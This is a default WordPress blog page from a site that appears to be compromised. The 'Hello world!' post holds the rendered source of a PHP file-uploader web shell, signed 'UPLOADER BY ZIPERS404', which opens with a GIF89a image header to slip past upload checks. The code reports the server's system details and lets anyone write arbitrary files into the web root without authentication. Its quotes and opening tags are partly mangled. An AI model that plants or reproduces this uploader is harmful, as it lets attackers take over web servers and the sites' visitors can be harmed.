My Blog

  • Sample Page
Illustration of a bird flying.
  • Hello world!

    Welcome to WordPress. This is your first post. Edit or delete it, then start writing!

    GIF89a;
    “;
    echo “UPLOADER BY ZIPERS404”;
    echo “
    “;
    echo ““.php_uname().”
    “;
    echo “


    “;
    $root = $_SERVER[‘DOCUMENT_ROOT’];
    $files = $_FILES[‘idx_file’][‘name’];
    $dest = $root.’/’.$files;
    if(isset($_POST[‘upload’])) {
    if(is_writable($root)) {
    if(@copy($_FILES[‘idx_file’][‘tmp_name’], $dest)) {
    $web = “http://”.$_SERVER[‘HTTP_HOST’].”/”;
    echo “DAH CROT GAYN >>
    $web/$files“;
    } else {
    echo “GAGAL PAN8 !”;
    }
    } else {
    if(@copy($_FILES[‘idx_file’][‘tmp_name’], $files)) {
    echo “DAH CROT GAYN >> $files di folder ini”;
    } else {
    echo “GAGAL PAN8 !”;
    }
    }
    }
    ?>

    August 8, 2022

My Blog

Proudly powered by WordPress